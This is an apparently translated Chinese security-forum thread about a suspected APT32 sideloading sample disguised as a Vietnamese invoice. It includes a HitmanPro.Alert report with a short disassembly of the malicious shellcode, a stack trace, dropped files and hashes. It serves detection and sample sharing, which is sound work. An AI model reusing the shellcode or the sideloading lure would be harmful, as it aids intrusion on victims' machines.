
[Virus sample] #APT32 (OceanLotus) (3.11) "white plus black" (signed EXE + malicious DLL) sample

Kinhold
Posted on 2021-3-12 10:11:21

Streaming updates are the real deal
,就一个.
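Posted on 2021-3-12 11:48:52
Zhiliang (智量) missed it on double-click. Not sure whether that is because there was no behavior or because the sample is just that good.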
hsks
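OP | Posted on 2021-3-12 12:04:20
,就一个. posted on 2021-3-12 11:48
Zhiliang (智量) missed it on double-click. Not sure whether that is because there was no behavior or because the sample is just that good.

It connected to a domain.
Report it to Huorong (火绒) for a look.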
sichuanwenxuan
Posted on 2021-3-12 12:12:39

,就一个.
Posted on 2021-3-12 15:35:37
hsks posted on 2021-3-12 12:04
It connected to a domain.
Report it to Huorong (火绒) for a look.

Double-clicked it and HitmanPro blocked it instantly. Awesome!

Mitigation   HeapHeapProtect
Timestamp    2021-03-12T07:32:27

Platform     10.0.19042/x64 v889 06_8e
PID          7652
WoW          x86
Feature      003D0A30000003A6
Application  D:\下载\Hoa don tien no\Hoa don tien no\Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe
Created      2021-03-12T07:32:24
Description  Microsoft Office Word 12

Callee Type  AllocateVirtualMemory

Shellcode (HHA) (0x00001000 bytes)
Owner of CALLER: (anonymous; allocated by 5AB9126C, wwlib.dll)

OwnerModule
Name         wwlib.dll
Thumbprint   f7b582887f4d99a014b8d8dc3b1417f7469a6131efd821e5383274371e76c302
SHA-256      fa259f953cd319da9bdcd84d40b2a89869bd307e8f9206b5653e78666f08f5b8
SHA-1        2620e17b03d829a740960a2c4d907b2f7ea2219c
MD5          c6423f8911ed975ffa735eb14573e9f7

02E40496  ff942404010000           CALL         DWORD [ESP+0x104]
02E4049D  8bd8                     MOV          EBX, EAX
02E4049F  895c2414                 MOV          [ESP+0x14], EBX
02E404A3  85db                     TEST         EBX, EBX
02E404A5  0f8401020000             JZ           0x2e406ac
02E404AB  8b4704                   MOV          EAX, [EDI+0x4]
02E404AE  33d2                     XOR          EDX, EDX
02E404B0  33c9                     XOR          ECX, ECX
02E404B2  89442444                 MOV          [ESP+0x44], EAX
02E404B6  33f6                     XOR          ESI, ESI
02E404B8  c744241801000000         MOV          DWORD [ESP+0x18], 0x1
02E404C0  660f1f440000             NOP          WORD [EAX+EAX+0x0]
02E404C6  f6c27f                   TEST         DL, 0x7f
02E404C9  7404                     JZ           0x2e404cf
02E404CB  03d2                     ADD          EDX, EDX
02E404CD  eb0d                     JMP          0x2e404dc

Stack Trace
#  Address  Module                   Location
-- -------- ------------------------ ----------------------------------------
1  750F3DE1 KernelBase.dll           VirtualAlloc +0x41

2  02E4049D (anonymous; wwlib.dll)  
            8bd8                     MOV          EBX, EAX
            895c2414                 MOV          [ESP+0x14], EBX
            85db                     TEST         EBX, EBX
            0f8401020000             JZ           0x2e406ac
            8b4704                   MOV          EAX, [EDI+0x4]
            33d2                     XOR          EDX, EDX
            33c9                     XOR          ECX, ECX
            89442444                 MOV          [ESP+0x44], EAX
            33f6                     XOR          ESI, ESI
            c744241801000000         MOV          DWORD [ESP+0x18], 0x1
            660f1f440000             NOP          WORD [EAX+EAX+0x0]
            f6c27f                   TEST         DL, 0x7f
            7404                     JZ           0x2e404cf
            03d2                     ADD          EDX, EDX
            eb0d                     JMP          0x2e404dc

3  02E40015 (anonymous; wwlib.dll)  
4  5AB91436 wwlib.dll                FMain +0x56
5  2F9F15D7 Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe
6  2F9F155D Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe
7  76C5FA29 kernel32.dll             BaseThreadInitThunk +0x19
8  77187C7E ntdll.dll                RtlGetAppContainerNamedObjectPath +0x11e
9  77187C4E ntdll.dll                RtlGetAppContainerNamedObjectPath +0xee

Loaded Modules (51)
-----------------------------------------------------------------------------
2F9F0000-2FA47000 Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe (Microsoft Corporation),
                  version: 12.0.4518.1014
77120000-772C3000 ntdll.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
76C40000-76D30000 KERNEL32.dll (Microsoft Corporation),
                  version: 10.0.19041.804 (WinBuild.160101.0800)
741E0000-742E0000 hmpalert.dll (SurfRight B.V.),
                  version: 3.8.8.889
74FD0000-751E4000 KERNELBASE.dll (Microsoft Corporation),
                  version: 10.0.19041.804 (WinBuild.160101.0800)
67B50000-67BEF000 apphelp.dll (Microsoft Corporation),
                  version: 10.0.19041.572 (WinBuild.160101.0800)
5ABC0000-5AC5B000 MSVCR80.dll (Microsoft Corporation),
                  version: 8.00.50727.9672
759B0000-75A6F000 msvcrt.dll (Microsoft Corporation),
                  version: 7.0.19041.546 (WinBuild.160101.0800)
5AB90000-5ABB2000 wwlib.dll (),
                  version:
75280000-75834000 SHELL32.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
76200000-7627B000 msvcp_win.dll (Microsoft Corporation),
                  version: 10.0.19041.789 (WinBuild.160101.0800)
76D30000-76E50000 ucrtbase.dll (Microsoft Corporation),
                  version: 10.0.19041.789 (WinBuild.160101.0800)
76610000-767A6000 USER32.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
764E0000-764F8000 win32u.dll (Microsoft Corporation),
                  version: 10.0.19041.867 (WinBuild.160101.0800)
76AA0000-76AC3000 GDI32.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
76120000-761FC000 gdi32full.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
76AD0000-76AF5000 IMM32.DLL (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
75840000-758C7000 SHCORE.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
76810000-76A91000 combase.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
76B00000-76BC0000 RPCRT4.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
75950000-759AD000 bcryptPrimitives.dll (Microsoft Corporation),
                  version: 10.0.19041.662 (WinBuild.160101.0800)
76410000-76455000 shlwapi.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
74940000-74F48000 windows.storage.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
74910000-74934000 Wldp.dll (Microsoft Corporation),
                  version: 10.0.19041.662 (WinBuild.160101.0800)
76BC0000-76C3A000 advapi32.dll (Microsoft Corporation),
                  version: 10.0.19041.610 (WinBuild.160101.0800)
76460000-764D6000 sechost.dll (Microsoft Corporation),
                  version: 10.0.19041.789 (WinBuild.160101.0800)
76320000-76403000 ole32.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
74890000-7489F000 kernel.appcore.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
74340000-743B4000 uxtheme.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
6E3A0000-6E463000 PROPSYS.dll (Microsoft Corporation),
                  version: 7.0.19041.746 (WinBuild.160101.0800)
76280000-76316000 OLEAUT32.dll (Microsoft Corporation),
                  version: 10.0.19041.804 (WinBuild.160101.0800)
758D0000-7594E000 clbcatq.dll (Microsoft Corporation),
                  version: 2001.12.10941.16384 (WinBuild.160101.080
748F0000-74908000 profapi.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
770D0000-7710B000 CFGMGR32.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
678E0000-678FB000 edputil.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
6E300000-6E393000 Windows.StateRepositoryPS.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
68320000-68530000 comctl32.dll (Microsoft Corporation),
                  version: 6.10 (WinBuild.160101.0800)
6DA10000-6DBB9000 urlmon.dll (Microsoft Corporation),
                  version: 11.00.19041.867 (WinBuild.160101.0800)
6D7E0000-6DA0B000 iertutil.dll (Microsoft Corporation),
                  version: 11.00.19041.844 (WinBuild.160101.0800)
5B820000-5B8A3000 policymanager.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
5B7B0000-5B815000 msvcp110_win.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
74530000-74558000 SspiCli.dll (Microsoft Corporation),
                  version: 10.0.19041.488 (WinBuild.160101.0800)
75B50000-75BAE000 coml2.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
635F0000-636CB000 wintypes.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
5B730000-5B7A1000 appresolver.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
5B6E0000-5B728000 Bcp47Langs.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
5B6C0000-5B6DF000 SLC.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
748C0000-748E5000 USERENV.dll (Microsoft Corporation),
                  version: 10.0.19041.572 (WinBuild.160101.0800)
5B6A0000-5B6BC000 sppc.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
5B660000-5B69D000 OneCoreCommonProxyStub.dll (Microsoft Corporation),
                  version: 10.0.19041.610 (WinBuild.160101.0800)
5B2C0000-5B660000 OneCoreUAPCommonProxyStub.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)

Process Trace
1  D:\下载\Hoa don tien no\Hoa don tien no\Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe [7652] 2021-03-12T07:32:27
2  C:\Windows\explorer.exe [3888] 2021-03-12T07:30:57
   C:\WINDOWS\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding
3  C:\Windows\System32\svchost.exe [652] 2021-03-12T07:30:32
   C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
4  C:\Windows\System32\services.exe [960] 2021-03-12T07:30:32
5  C:\Windows\System32\wininit.exe [888] 2021-03-12T07:30:32
   wininit.exe
6  C:\Windows\System32\smss.exe [648] 2021-03-12T07:30:28 3.9s
   \SystemRoot\System32\smss.exe 000000cc 00000084
7  C:\Windows\System32\smss.exe [560] 2021-03-12T07:30:27
   \SystemRoot\System32\smss.exe

Services
652  BrokerInfrastructure
652  DcomLaunch
652  PlugPlay
652  Power
652  SystemEventsBroker

Dropped Files
1  C:\Users\zt656\AppData\Local\Temp\Office.doc
     Dropped by \Device\HarddiskVolume5\下载\Hoa don tien no\Hoa don tien no\Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe [7652]
1  C:\Users\zt656\AppData\Local\Temp\OptaneIconOverlay.ico
     Dropped by \Device\HarddiskVolume3\Windows\explorer.exe [3888]

Thumbprints
c6b7a20aac5e983aeadd13cec4465a0fe62ace4290be56eda79570fd4605ffde (code)
f7b582887f4d99a014b8d8dc3b1417f7469a6131efd821e5383274371e76c302 (ownermodule)
5acbe81129129554aea54f40003596ddafec44afa6890316aa5b8abd2054420b (pfn)


NT狼狼
Posted on 2021-3-12 15:46:14
Duba (毒霸)


Copyright © KaFan  KaFan.cn All Rights Reserved.
